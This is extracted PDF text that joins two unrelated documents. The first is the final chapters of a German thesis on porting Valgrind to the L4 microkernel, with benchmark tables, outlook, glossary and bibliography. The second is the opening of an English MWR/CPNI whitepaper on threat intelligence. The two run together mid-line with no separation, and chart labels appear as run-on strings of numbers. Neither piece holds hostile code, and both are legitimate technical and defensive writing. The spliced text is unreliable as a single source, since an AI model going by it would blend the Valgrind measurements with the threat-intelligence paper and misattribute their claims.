|: #:: : ::: :: : :: :: :: :: : :: :: :: :: : : : : : ::: ::@ :::
|: #:: : ::: :: :: :: :: :: :: :. :: :: ::. :: :.: : .: : .::: .::@ .:::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: ::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: ::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: ::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: .::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: :::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: :::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: :::: : :: : :::: :::@ ::::
|: #:: : ::: :: :: :: :: :: :: :: :: :: ::: :: :::: : :: : :::: :::@ ::::
0 +----------------------------------------------------------------------->Gi
0 1.114
Number of snapshots: 53
Detailed snapshots: [2 (peak), 47]
Abbildung 4.3: Speicherverbrauch von tinycc auf L4
Wie Memcheck lässt sich auch Massif nutzen, solange keine L4Env spezifische
Funktionen zur Speicherallokation benutzt werden.
Helgrind & DRD
Mit den Valgrind-Tools Helgrind und DRD können Programme mit Threads
analysiert werden. Helgrind dient zum Finden von Synchronisationsfehlern,
während DRD Fehler bei gemeinsamer Speichernutzung durch Threads findet.
Beide Tools setzten für die Analyse POSIX-Threads (pthreads) voraus. Da das
L4Env keine Unterstützung für POSIX-Threads bietet, sind beide Tools nicht ohne
Modifikationen in L4 einsetzbar.
55
4 Auswertung
Lackey & Nulgrind
Lackey ist ein einfaches Valgrind-Tool, das während der Ausführung des Gastes in
Valgrind Daten sammelt. Zu diesen Daten gehört beispielsweise die Anzahl der
Basic Blocks, die ausführt wurden sowie die Anzahl der ausgeführten Instruktio-
nen.
Nulgrind ist das minimalste Valgrind-Tool. Es führt keine Instrumentierung
des Gastes durch. Mit Nulgrind können die Geschwindigkeitsverluste durch die
dynamische binäre Analyse ermittelt werden.
Beide Werkzeuge können auf L4 ohne Modifikation eingesetzt werden.
Außer Helgrind und DRD laufen also alle Standard-Valgrind-Tools ohne An-
passungen auf L4. Massif und Memcheck müssten angepasst werden, um auch
alle L4Env-spezifischen Funktionen zur Allokation und Freigabe von Speicher
überprüfen zu können.
4.3 Performance
Um die Geschwindigkeit meiner Portierung zu bewerten, messe ich die Laufzeit
von Gast-Programmen in Valgrind. Ziel ist es, die Geschwindigkeit der Ausführung
von Gästen in Valgrind unter L4 und Linux zu vergleichen. Dazu nehme ich eine
Portierung der zu Valgrind gehörenden Performance-Test-Suite vor. Mit ihr kann
die Geschwindigkeit von Valgrinds Core, der LibVEX und den Tools bewertet
werden. Zusätzlich zu dieser portiere ich ein Programm zur Berechnung von
MD5-Summen.
Zu Valgrind besitzt zudem eine Regression-Test-Suite. Diese wird aufgrund der
Abhängigkeit von POSIX-Funktionen wie fork() , clone() , POSIX-Threads und
Signalen nicht portiert.
Da außerdem die Geschwindigkeit von IPC auf mikrokern-basierten Systemen
eine besondere Rolle spielt, implementiere ich zwei kleine IPC-Benchmarks –
thread_ipc undtask_ipc . Die meisten Benchmarks eignen sich auch zur Beurtei-
lung der Qualität, da sie bewertbare Ausgaben wie Hash-Werte ( md5sum ) oder
ein Binary ( tinycc ) liefern.
Für die Bewertung der Performance meiner Portierung von Valgrind auf L4
habe ich zusammenfassend folgende Testprogramme benutzt:
•bigcode führt eine Menge Code aus. Es wird für das Vergleichen der Über-
setzungsgeschwindigkeiten von Valgrinds JIT-Compiler genutzt.
•heap alloziert große Mengen Speicher und gibt sie wieder frei. Seine
Aufgabe ist das Testen der Speicherverwaltung von Valgrind.
56
4.3 Performance
•sarp alloziert große Objekte auf dem Stack und gibt sie wieder frei.
•bz2ist ein von Julian Seward (dem Entwickler Valgrinds) entwickeltes, frei
verfügbares Programm, das der verlustfreien Kompression dient.
•fbench führt Raytracing-Algorithmen aus.
•ffbench berechnet Fast-Fourier-Transformationen. Wie bei fbench werden
dabei viele Floating-Point-Operationen ausgeführt.
•tinycc ist ein kleiner und schneller C-Compiler.
•md5sum führt den „Message-Digest-Algorithm 5“ aus. Mit md5sum können
Hash-Werte für Dateien oder Zeichenketten erzeugt werden.
•thread_ipc +task_ipc sind zwei kleine Programme für die Bewertung
der IPC-Performance. Zwei Tasks /Threads schicken sich gegenseitig eine
bestimmte Anzahl von IPCs zu, um am Ende die Laufzeit einer IPC be-
rechnen zu können. Das Testprogramm thread_ipc dient zum Messen der
IPC-Performance zwischen Threads innerhalb eines Adressraums. Demge-
genüber kann mit task_ipc die Geschwindigkeit von IPCs über Adressraum-
grenzen hinweg bestimmt werden.
In den Tabellen 4.1, 4.2, 4.3, 4.4 und 4.5 sind die Messergebnisse der einzelnen
Testprogramme dargestellt. Für jedes Programm messe ich die Laufzeit auf L4
und Linux mit und ohne Valgrind. Bei der Ausführung in Valgrind berücksichtige
ich außerdem, welches Valgrind-Tool den Gast instrumentiert. Zusätzlich zur
absoluten Laufzeit ist der Speeddown gegenüber der nativen Ausführung auf der
jeweiligen Plattform angegeben. Jede einzelne Messung wird fünf Mal durchge-
führt. Die Standardabweichung der gemessenen Werte wird in den genannten
Tabellen dargestellt. Abbildung 4.4, 4.5, 4.6, 4.7 und 4.8 zeigen die Speeddowns
der einzelnen Valgrind-Tools in L4 und Linux.
Als Nächstes möchte ich Gründe für Geschwindigkeitsunterschiede zwischen
Valgrind auf L4 und Linux diskutieren.
Bedingt durch das Multi-Server-OS (DROPS) laufen viele Operationen wie das
Lesen oder Schreiben von Dateien oder die Allokation und das Freigeben von
Speicher durch zusätzliche Kontextwechsel langsamer ab. Bei monolithischen
Systemen muss zum Ausführen solcher Operationen in den Kern und wieder
zurück in den Nutzermodus gewechselt werden, also werden dann insgesamt
2 Kontextwechsel benötigt. Bei mikrokern-basierten Systemen muss zu einem
Server gewechselt werden, der in einem anderen Kontext im Nutzermodus ausge-
führt wird. Da Kontextwechsel nur durch den Kern durchgeführt werden können,
57
4 Auswertung
sind für die oben genannten Operationen 4 Kontextwechsel notwendig. Dies
wirkt sich besonders bei Memcheck und Callgrind aus.
Die Portierung L4 /Valgrind unterstützt mangels vollständiger Implementation
im L4Env keine POSIX-Signale (siehe 3.1.3). Dies kann Geschwindigkeitssteige-
rungen bei der Ausführung von Programmen in L4 /Valgrind zu Folge haben.
Durch die interpretierte Ausführung des Gastes und der Serialisierung von
Threads in Valgrind entsteht ein Overhead. Beim Vergleich der Speeddowns der
Testprogramme thread_ipc undtask_ipc wird dies besonders deutlich. Allgemein
ist zu erwarten, dass das Senden und Empfangen von IPCs innerhalb eines
Adressraums schneller ist als über Adressraumgrenzen hinweg. Dies wird durch
die absoluten Messwerte der nativen Ausführung von thread_ipc undtask_ipc
belegt. Werden die Testprogramme jedoch in Valgrind ausgeführt, führt der durch
die Serialisierung von Threads und durch die interpretierte Ausführung des
Gastes verursachte Overhead dazu, dass die Kommunikation innerhalb eines
Adressraums langsamer ist als die über Adressraumgrenzen hinweg.
Zusammengefasst zeigt ein Vergleich der Speeddown-Durchschnitte der einzel-
nen Tools, dass Valgrind in L4 mehr Overhead produziert als unter Linux. Der
Overhead resultiert aus meiner nicht einzig auf Performance basierenden Portie-
rung und den zu erwartenden Geschwindigkeitsverlusten in mikrokern-basierten
Systemen. In Abbildung 4.9 sind die Mittelwerte der Speeddowns der einzelnen
Valgrind-Tools unter Linux und L4 in Form einer Tabelle und eines Diagramms
dargestellt.
58
4.3 Performance
Ausführungs- OS md5sum sarp
Umgebung absolut speed- σ absolut speed- σ
(in s) down (in s) down
nativ Linux 0,020878 0,000053 0,158114 0,000683
L4 0,020407 0,000036 0,162271 0,000492
Valgrind / Linux 0,125090 5,99 0,000248 1,386197 8,77 0,001673
Nulgrind L4 0,124462 6,10 0,000288 0,988605 6,09 0,000466
Valgrind / Linux 0,326405 15,63 0,001025 8,661692 54,78 0,095358
Memcheck L4 0,504258 24,71 0,000371 12,988696 80,04 0,000890
Valgrind / Linux 0,248065 11,88 0,001142 10,956045 69,29 0,174846
Callgrind L4 0,293102 14,36 0,000325 14,212325 87,58 0,000803
Valgrind / Linux 0,608405 29,14 0,001875 13,382577 84,64 0,058727
Cachegrind L4 0,785899 38,51 0,003754 13,908240 85,71 0,000565
Valgrind / Linux 0,117554 5,63 0,000301 1,549279 9,80 0,002438
Massif L4 0,204990 10,05 0,000042 0,701126 4,32 0,000479
Valgrind / Linux 0,813959 38,99 0,003838 16,438216 103,96 0,056762
Lackey L4 0,802292 39,32 0,000180 10,815995 66,65 0,000317
Speeddown ist das Verhältnis der Ausführungsgeschwindigkeit des Gastes in Valgrind zu der
Ausführungsgeschwindigkeit bei nativer Ausführung. Bei der Berechnung werden die Zeiten der
jeweiligen Plattformen zueinander in Verhältnis gesetzt.
σbezeichnet die Standardabweichung der Messwerte.
Tabelle 4.1: Absolute Ausführungszeiten und Speeddown von md5sum undsarp
NulgrindMemcheckCallgrindCachegrindMassifLackey0,005,0010,0015,0020,0025,0030,0035,0040,0045,00
L4LinuxSpeeddown
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0020,0040,0060,0080,00100,00120,00
L4LinuxSpeeddown
Abbildung 4.4: Speeddown von md5sum (links) und sarp (rechts)
59
4 Auswertung
Ausführungs- OS bigcode tinycc
Umgebung absolut speed- σ absolut speed- σ
(in s) down (in s) down
nativ Linux 1,422873 0,000990 0,538167 0,013854
L4 1,485350 0,000327 1,085501 0,000842
Valgrind / Linux 8,884175 6,24 0,003240 3,914253 7,27 0,007953
Nulgrind L4 37,078642 24,96 0,010935 4,593944 4,23 0,000680
Valgrind / Linux 23,603235 16,59 0,131359 18,054462 33,55 0,084041
Memcheck L4 54,302207 36,56 0,007712 81,804047 75,36 0,061867
Valgrind / Linux 70,777851 49,74 0,054840 32,121045 59,69 0,045854
Callgrind L4 137,709932 92,71 0,008231 52,084906 47,98 0,001255
Valgrind / Linux 90,048666 63,29 0,285969 36,858018 68,49 0,081796
Cachegrind L4 145,010640 97,63 0,012097 51,137975 47,11 0,001540
Valgrind / Linux 10,480120 7,37 0,004898 5,206044 9,67 0,040083
Massif L4 39,171893 26,37 0,002589 7,662775 7,06 0,001405
Valgrind / Linux 108,357856 76,15 0,063031 59,423723 110,42 0,108168
Lackey L4 136,311110 91,77 0,003621 124,04885 114,28 0,001601
Tabelle 4.2: Absolute Ausführungszeiten und Speeddown von bigcode undtinycc
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0020,0040,0060,0080,00100,00120,00
L4LinuxSpeeddown
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0020,0040,0060,0080,00100,00120,00
L4LinuxSpeeddown
Abbildung 4.5: Speeddown von bigcode (links) und tinycc (rechts)
60
4.3 Performance
Ausführungs- OS heap bz2
Umgebung absolut speed- σ absolut speed- σ
(in s) down (in s) down
nativ Linux 0,261012 0,012070 0,370418 0,002650
L4 0,358165 0,001689 0,986811 0,004217
Valgrind / Linux 1,565423 6,00 0,048036 1,496535 4,04 0,010765
Nulgrind L4 2,666474 7,44 0,021380 2,911520 2,95 0,011135
Valgrind / Linux 9,720407 37,24 0,104030 5,287746 14,28 0,045698
Memcheck L4 16,635801 46,45 0,024112 16,532406 16,75 0,010701
Valgrind / Linux 20,718314 79,38 0,035441 9,351953 25,25 0,046698
Callgrind L4 41,759480 116,59 0,026078 29,128020 29,52 0,010769
Valgrind / Linux 18,880785 72,34 0,072055 22,052116 59,53 0,019033
Cachegrind L4 35,344580 98,68 0,020948 75,776531 76,79 0,095402
Valgrind / Linux 6,860661 26,28 0,040234 1,649219 4,45 0,012863
Massif L4 11,029209 30,79 0,011434 4,053913 4,11 0,005164
Valgrind / Linux 34,637121 132,70 0,366217 23,803989 64,26 0,118678
Lackey L4 55,317933 154,45 0,099244 68,562864 69,48 0,096773
Tabelle 4.3: Absolute Ausführungszeiten und Speeddown von heap undbz2
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0020,0040,0060,0080,00100,00120,00140,00160,00180,00
L4LinuxSpeeddown
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0010,0020,0030,0040,0050,0060,0070,0080,0090,00
L4LinuxSpeeddown
Abbildung 4.6: Speeddown von heap (links) und bz2(rechts)
61
4 Auswertung
Ausführungs- OS fbench ffbench
Umgebung absolut speed- σ absolut speed- σ
(in s) down (in s) down
nativ Linux 6,514041 0,015798 0,724180 0,007163
L4 8,373969 0,024873 0,692319 0,000227
Valgrind / Linux 26,408286 4,05 0,189409 2,067543 2,86 0,001497
Nulgrind L4 55,234870 6,60 0,004825 2,090899 3,02 0,000447
Valgrind / Linux 85,948925 13,19 0,273270 8,399294 11,60 0,139332
Memcheck L4 97,849089 11,68 0,012302 10,077690 14,56 0,002198
Valgrind / Linux 116,716291 17,92 0,536137 6,670265 9,21 0,099952
Callgrind L4 161,832875 19,33 0,016005 9,433415 13,63 0,005423
Valgrind / Linux 201,291373 30,90 0,683056 45,724534 63,14 0,099293
Cachegrind L4 286,906538 34,26 0,069892 63,289816 91,42 0,002270
Valgrind / Linux 27,320280 4,19 0,257252 2,099264 2,90 0,003758
Massif L4 26,122159 3,12 0,001774 2,223904 3,21 0,000406
Valgrind / Linux 384,658861 59,05 2,146621 33,726396 46,57 0,362043
Lackey L4 391,093999 46,70 0,008230 35,885793 51,83 0,000704
Tabelle 4.4: Absolute Ausführungszeiten und Speeddown von fbench undffbench
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0010,0020,0030,0040,0050,0060,0070,00
L4LinuxSpeeddown
NulgrindMemcheckCallgrindCachegrindMassifLackey0,0010,0020,0030,0040,0050,0060,0070,0080,0090,00100,00
L4LinuxSpeeddown
Abbildung 4.7: Speeddown von fbench (links) und ffbench (rechts)
62
4.3 Performance
Ausführungs- task_ipc thread_ipc
Umgebung absolut speed- σ absolut speed- σ
(in s) down (in s) down
nativ
0,099310 1,00 0,007074 0,078684 1,00 0,000370
Valgrind /
Nulgrind 0,205182 2,07 0,020509 0,266674 3,39 0,001760
Valgrind /
Memcheck 0,268694 2,71 0,000371 0,395482 5,03 0,001566
Valgrind /
Callgrind 0,348677 3,51 0,006562 0,546231 6,94 0,000260
Valgrind /
Cachegrind 0,376359 3,79 0,000436 0,611359 7,77 0,000853
Valgrind /
Massif 0,242669 2,44 0,043065 0,268454 3,41 0,000415
Valgrind /
Lackey 0,374199 3,77 0,022782 0,587072 7,46 0,010988
Tabelle 4.5: Absolute Ausführungszeiten und Speeddown von task_ipc und
thread_ipc
task_ipcthread_ipc0,001,002,003,004,005,006,007,008,009,00
nativNulgrindMemcheckCallgrindCachegrindMassifLackeySpeeddown
Abbildung 4.8: Speeddown von task_ipc (links) und thread_ipc (rechts)
63
4 Auswertung
Valgrind Linux L4
Nulgrind 5,65 7,67
Memcheck 24,61 38,26
Callgrind 40,29 52,71
Cachegrind 58,93 71,26
Massif 8,79 11,13
Lackey 79,01 79,31
NulgrindMemcheckCallgrindCachegrindMassifLackey0102030405060708090
L4
LinuxSpeeddown
Abbildung 4.9: Durchschnitt der Speeddowns der einzelnen Tools in Linux und
L4
64
5 Zusammenfassung
5.1 Ausblick
Die mir gestellte Aufgabe ist zwar mit vorliegender Arbeit abgeschlossen. Es hat
sich aber gezeigt, dass weiterführende Fragen einer Lösung bedürfen. Dazu bedarf
es einer Weiterentwicklung von L4 /Valgrind mit entsprechenden Tests. Außerdem
können mit L4 /Valgrind bestehende L4Env-Anwendungen auf Fehler überprüft
oder ihr Verhalten während der Laufzeit analysiert werden. Dazu könnten neue
Tools, basierend auf dem Framework Valgrind, für L4 entwickelt werden. Konkret
ist die Fortsetzung der Arbeit in folgenden Punkten möglich:
Um das Problem der Synchronisation von Region-Mapper und Valgrinds Spei-
cherverwaltungssystem (siehe Kapitel 3.2.2) zu lösen, könnte die Funktionalität
des Region-Mappers in Valgrind integriert werden. Valgrind würde dadurch abso-
lute Kontrolle über den Aufbau des Adressraums erlangen.
Wie im vorherigen Kapitel beschrieben, können nicht alle Standard-Tools von
Valgrind im L4Env eingesetzt werden. Helgrind und DRD sind Tools zur Analyse
von Anwendungen, die POSIX-Threads nutzen. Damit erstere eingesetzt werden
können, müssen sie so angepasst werden, dass auch die Untersuchung nativer
L4-Threads möglich wird. Alternativ könnte eine POSIX-Thread-Bibliothek für
das L4Env entwickelt werden.
Neben den Standard-Tools von Valgrind gibt es viele weitere. Diese könnten
hinsichtlich ihrer Eignung für mikrokern-basierte Systeme untersucht und gegebe-
nenfalls portiert werden. Außerdem ist die Entwicklung von Tools für Probleme,
die auf mikrokern-basierten Systemen zu Fehlern führen, denkbar. Dazu sind
Modelle und Beschreibungen für typische Fehler notwendig.
L4Linux ist eine para-virtualisierte Version von Linux ( [11],[15]). Aufbauend
auf meiner Arbeit wäre die Analyse von L4Linux in Valgrind möglich. Dazu
müssten die existierenden Valgrind-Tools auf ihre Fähigkeit der Analyse para-
virtualisierter Betriebssysteme untersucht werden.
Meine Portierung beschränkt sich auf L4.Fiasco für die x86-Architektur. Um
auch die x86 /64-Architektur zu unterstützen, sind vor allem Anpassungen der
Systemaufruf-Behandlung in L4 /Valgrind nötig.
65
5 Zusammenfassung
DasL4RE (L4 Runtime Enviroment )[16]ist der Nachfolger des L4Envs. In einer
weiteren Arbeit könnte Valgrind auf L4RE portiert werden. Damit wäre die Ana-
lyse von L4RE-Anwendungen möglich. Da das L4RE POSIX-Threads unterstützt,
können die Valgrind-Tools Helgrind und DRD zur Fehlersuche in Anwendungen
mit Threads genutzt werden.
5.2 Abschließende Worte
„Program testing can be used to show the presence of bugs, but never
to show their absence! “ (Edsger Dijkstra)
Das Ziel dieser Arbeit war es, das Framework Valgrind auf den L4.Fiasco-
Mikrokern und das L4-Environment zu portieren. Zusätzlich dazu habe ich Val-
grinds Standard-Tools Memcheck, Callgrind, Cachegrind, Massif und Lacky por-
tiert, ohne große Änderungen vornehmen zu müssen. Helgrind und DRD können
mangels einer Bibliothek für POSIX-Threads im L4Env nicht eingesetzt werden.
Dennoch gibt es viele Möglichkeiten, die Arbeit weiterzuführen und zu ver-
bessern. Mikrokerne werden sich in Zukunft weiter verbreiten. Die steigende
Komplexität von Software fordert Methoden zur automatischen Fehlersuche.
Während meiner Arbeit und bei späteren Tests wurden Fehler im L4Env ent-
deckt und behoben. Außerdem waren Erweiterungen des L4Env für Valgrind
notwendig.
Als Ergebnis dieser Arbeit kann Valgrind zusammen mit den Tools als Werkzeug
zur Unterstützung der Entwicklung von L4Env-basierten Anwendungen eingesetzt
werden. Für Fehler, die nicht oder nur teilweise mit den existierenden Tools
gefunden werden können, bildet das Framework Valgrind eine gute Grundlage
zur Entwicklung neuer Tools.
66
Glossar
ABI Application Binary Interface , Schnittstel-
le auf Maschinenebene zwischen einem
Programm und dem Betriebssystem11
API Application Programming Interface , Pro-
grammierschnittstelle zur Anbindung an-
derer Software an das System7
Basic Blocks Maschinencode-Sequenzen, die an
Funktions-Einsprungpunkten begin-
nen und mit einem den Kontrollfluss
beeinflussenden Befehl enden.17
Binary ausführbare Datei, besteht aus
Maschinen-Instruktionen oder Byte-
code7
Dataspace Container für unterschiedliche Arten von
Speicher36
Flexpages beschreiben Bereiche des virtuellen
Adressraumes in L434
Framework Skelett einer Anwendung, welches ange-
passt werden kann.15, 22
IPC Inter Process Communication , Kommuni-
kation zwischen zwei Tasks und Threads
zur Datenübertragung32, 34, 44
L4 L4 ist eine Familie von Mikrokernen der
zweiten Generation, ursprünglich ent-
wickelt und implementiert von Jochen
Liedtke [17].11, 34
67
Glossar
L4Env Das L4Env ist eine Umgebung zur Ent-
wicklung von Programmen basierend auf
L4-Mikrokernen.13
L4VFS L4 virtual file system layer , stellt POSIX-
Funktionalität für L4Env-Anwendungen
zur Verfügung.32
LibVEX Eine Bibliothek für dynamisch binäre
Übersetzung und Instrumentierung15, 16
Region-Mapper Dient der Verwaltung des virtuellen
Adressraumes einer L4Env Task und ist
verantwortlich für das Auflösen von Pa-
gefaults36
RISC Reduced Instruction Set Computing , Com-
puterarchitektur mit reduziertem Befehls-
satz4
UCode Der Maschinencode des Gastes wird
durch die LibVEX in einen Bytecode, ge-
nauer in UCode, übersetzt.17, 23
Valgrinds Core Kern des Frameworks Valgrind; steuert
die Ausführung des Gastes15
68
Literaturverzeichnis
[1]Parasoft Insure ++enables fast, reliable detection and resolution of elusive
runtime memory errors.
http://www.parasoft.com/jsp/products/home.jsp?product=
Insure&itemId=63 . 10
[2]IA-32 Intel Architecture Software Developer’s Manual, Volume 3: System
Programming Guide, Order Number 253668, 2004. 44
[3]KCachegrind.
http://kcachegrind.sourceforge.net/cgi- bin/show.cgi/
KcacheGrindIndex , 2009. 54
[4]OpenWorks: Software Design and Engineering.
http://www.open- works.co.uk/ , 2009. 17
[5]Parasoft delivers quality as a continuous process.
http://www.parasoft.com , 2009. 10
[6]uClibc – a C library for embedded Linux.
http://www.uclibc.org/ , 2009. 32
[7]Derek Bruening, Timothy Garnett, and Saman Amarasinghe. An infra-
structure for adaptive dynamic optimization. In CGO ’03: Proceedings of
the international symposium on Code generation and optimization , pages
265–275, Washington, DC, USA, 2003. IEEE Computer Society. 8
[8]Bryan Buck and Jeffrey K. Hollingsworth. An API for Runtime Code Pat-
ching. The International Journal of High Performance Computing Applications ,
14:317–329, 2000. 9
[9]R. Hastings and B. Joyce. Purify: Fast Detection of Memory Leaks and Access
Errors. In Proc. of the Winter 1992 USENIX Conference , pages 125–138, San
Francisco, California, 1991. 9
[10]Michael Hohmuth. The fiasco kernel: Requirements definition. Technical
report, Technische Universität Dresden, 1998. 44
69
Literaturverzeichnis
[11]Hermann Härtig, Michael Hohmuth, and Jean Wolter. Taming Linux. In
Proceedings of the 5th Annual Australasian Conference on Parallel And Real-
Time Systems (PART ’98) , Adelaide, Australia, September 1998. http:
//os.inf.tu- dresden.de/papers_ps/part98.ps . 65
[12]Michiel Ronsse Jonas Maebe and Koen De Bosschere. DIOTA: Dynamic
instrumentation, optimization and transformation of applications. In In
Proc. 4th Workshop on Binary Translation (WBT’02) , 2002. 8
[13]S. Karthik and H. G. Jayakumar. Static Analysis: C Code Error Checking for
Reliable and Secure Programming. In IEC (Prague) , pages 434–439, 2005.
1
[14]Chi keung Luk, Robert Cohn, Robert Muth, Harish Patil, Artur Klauser, Geoff
Lowney, Steven Wallace, Vijay Janapa, and Reddi Kim Hazelwood. Pin:
Building customized program analysis tools with dynamic instrumentation.
InIn Programming Language Design and Implementation , pages 190–200.
ACM Press, 2005. 7
[15]Adam Lackorzynski. L4Linux on L4Env. Großer Beleg, Technische Universi-
tät Dresden, Fakultät Informatik, Institut für Systemarchitektur, Professur
Betriebssysteme, 2002. http://os.inf.tu- dresden.de/papers_ps/
adam- beleg.pdf . 65
[16]Adam Lackorzynski and Alexander Warg. Taming Subsystems - Capabilities
as Universal Resource Access Control in L4. In Workshop on Isolation and
Integration in Embedded Systems (IIES) , 2009. 66
[17]J. Liedtke. On micro-kernel construction. In SOSP ’95: Proceedings of the
fifteenth ACM symposium on Operating systems principles , pages 237–250,
New York, NY, USA, 1995. ACM. 11, 12, 67
[18]Jochen Liedtke. Toward real microkernels. Commun. ACM , 39(9):70–77,
1996. 35
[19]Nicholas Nethercote. Bounds-checking entire programs without recompi-
ling. In In SPACE 2004 , 2004. 1
[20]Nicholas Nethercote. Dynamic Binary Analysis and Instrumentation . PhD
thesis, Computer Laboratory, University of Cambridge, United Kingdom,
November 2004. 3, 4, 12, 19
70
Literaturverzeichnis
[21]Nicholas Nethercote and Julian Seward. Valgrind: A Program Supervision
Framework. Electronic Notes in Theoretical Computer Science , 89(2), 2003.
5, 15, 16
[22]Nicholas Nethercote and Julian Seward. Valgrind: A Framework for Heavy-
weight Dynamic Binary Instrumentation. In Proceedings of ACM SIGPLAN
2007 Conference on Programming Language Design and Implementation
(PLDI 2007) , pages 89–100, San Diego, California, USA, June 2007. 15, 18
[23]Operating Systems Research Group. - L4 Env - An Environment for L4
Applications, 2003. 13
[24]Lars Reuther. L4 Region Mapper Reference Manual.
http://os.inf.tu- dresden.de/l4env/doc/html/l4rm/index.
html . 36
[25]Anand Gaurav Satish Chandra Gupta. Advanced features of IBM Rational
Purify: Debugging with Purify.
http://www.ibm.com/developerworks/rational/library/08/
0205_gupta- gaurav , 2008. 9
[26]Julian Seward and Nicholas Nethercote. Using Valgrind to detect undefined
value errors with bit-precision. In ATEC ’05: Proceedings of the annual
conference on USENIX Annual Technical Conference , pages 2–2, Berkeley, CA,
USA, 2005. USENIX Association. 52
71Threat Intelligence: 
Collecting, Analysing, Evaluating
MWR would like to acknowledge the help and  
support of CPNI and CERT-UK in researching this  
topic and producing the accompanying productsDavid Chismon
Martyn RuksAuthors:
3/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukContents
Introduction 4
What is Threat Intelligence? 5
What is Intelligence? 5
Different Definitions  5
Subtypes of Threat Intelligence  6
One Source, Multiple Intelligence Types  7
How Do You Build and Evaluate a 
Threat Intelligence Programme? 8
The Threat Intelligence Cycle  8
A Modified TI Functional Flow 9
How to Build a Threat Intelligence 
Programme  10
How Not to Build a Threat Intelligence 
Programme  10
Official or Unofficial? 10
Need to Share 11
How to Share 11
What Prevents Sharing? 12
Vulnerability Assessment  
and Threat Intelligence 12
Collecting, Using and Sharing 13Strategic Threat Intelligence 13
Definition  13
How to Set Requirements 13
How to Collect 14
How to Analyse 15
Production and Use 15
How to Evaluate 16
How to Share 16
Operational Threat Intelligence 17
Definition  17
How to Set Requirements 17
How to Collect 18
How to Analyse 18
Production and Use 19
How to Evaluate 19
How to Share 19
Tactical Threat Intelligence 20
Definition 20
How to Set Requirements 20
How to Collect 20
How to Analyse 20
Production and Use 21
How to Evaluate 21
How to Share 21Technical Threat Intelligence 22
Definition  22
How to Set Requirements 22
How to Collect 22
How to Analyse 24
Production and Use 25
How to Evaluate 25
How to Share 25
Summary 26
Quick Wins 27
Functions of a Threat   
Intelligence Team 28
Glossary 29Further Reading 30
Maturity Model 30
References 35
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk4/36Threat intelligence is rapidly becoming an ever-higher business 
priority. There is a general awareness of the need to ‘do’ threat 
intelligence, and vendors are falling over themselves to offer a 
confusingly diverse array of threat intelligence products.Introduction
01000020000300004000050000600007000080000
20123600046000
2013 20061170
201118700
10400
2010 20096360
20084470
2007226076000
2014
The promise of threat intelligence is alluring. 
It should help organisations to understand and manage business risk – to turn unknown 
threats into known and mitigated threats, 
and to improve the effectiveness of defence. After all, targeted attacks need targeted defence. If analysis is performed correctly, 
the products of threat intelligence can be 
genuinely useful to a business, providing  real benefits at all levels, from on-the-ground defenders to the board.
However, threat intelligence is currently  
very loosely defined, with little agreed  consensus on what it is and how to use it. There is a risk that in the hurry to keep  
up with the threat intelligence trend,  
organisations will end up paying large amounts of money for products that are interesting but of little value in terms of improving the security of their business. 
‘Doing’ threat intelligence is important –  
but doing it right is critical.
To address this, MWR InfoSecurity reviewed 
the area and designed a framework for 
threat intelligence that can be scaled to different sectors, sizes of organisation,  and organisational goals. The paper is  the product of literature reviews, internal  
experience, and a large number of interviews 
with people involved in threat intelligence and related fields across a range of  organisations.Figure 1: Google results for “threat intelligence” from different years
5/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukWhat is Intelligence?
Intelligence is regularly defined as  
information that can be acted upon to 
change outcomes. It’s worth considering traditional  intelligence before exploring threat  intelligence, as in many ways the  
latter is simply traditional intelligence  
applied  to cyber threats.
Since Donald Rumsfeld’s DoD briefing 
in 2002, the concept of ‘knowns’ and 
‘unknowns’ tends to appear regularly in discussions on the subject of intelligence. An ‘unknown unknown’ is a threat or risk 
that we don’t know we don’t know about – in 
other words, we have no idea that the threat even exists. For example, we are completely unaware that someone is waiting outside the office to attack the CEO. A ‘known  
unknown’ is something we know that we 
don’t know: perhaps we’ve been told that the CEO is going to be attacked outside the office, but we have no details as to who,  why, when or how.
One description of threat intelligence  
is the process of moving topics from  ‘unknown unknowns’ to ‘known unknowns’ 
by discovering the existence of threats, and 
then shifting ‘known unknowns’ to ‘known knowns’, where the threat is well understood and mitigated. For example, once we’ve been told the CEO is going to be attacked outside 
our office, we find out who the attackers  
are and what weapons they’re carrying;  and then inform the CEO so that travel plans can be changed – or the attackers arrested 
before the incident takes place. What is Threat Intelligence?
Known Knowns
Known Unknowns
Unknown UnknownsIntelligence
Understandably, the aim is to have the  
majority of risks in the ‘known knowns’  category, while developing some current 
‘known unknowns’ and allowing as few 
threats as possible to remain as ‘unknown unknowns’. However, this is a considerable challenge in traditional intelligence and 
equally so when applied to cyber threats. 
The Butler Review of Intelligence on  Weapons of Mass Destruction noted a limitation of intelligence, in that it is often incomplete and seldom obtains the whole 
story – as intelligence inherently seeks 
to gain knowledge of things that others are working to obscure
1. Furthermore, the 
report commented that, “The necessary protective security procedures with which 
intelligence is handled can reinforce a  
mystique of omniscience.” 
It could be argued that the NDAs (non- 
disclosure agreements), marketing and sheer price of cyber threat intelligence  can contribute to the same perception  of omniscience by its consumers.
Different Definitions
In the world of information and cyber  
security, threat intelligence is a young  
field and there are large numbers of threat intelligence vendors and advisory papers that describe very different products and activities under the banner of ‘threat  
intelligence’. As with traditional intelligence, 
a core definition is that threat intelligence  is information that can aid decisions,  with the aim of preventing an attack or 
decreasing the time taken to discover an 
attack. Intelligence can also be information that, instead of aiding specific decisions, helps to illuminate the risk landscape.However, the nature of that information  
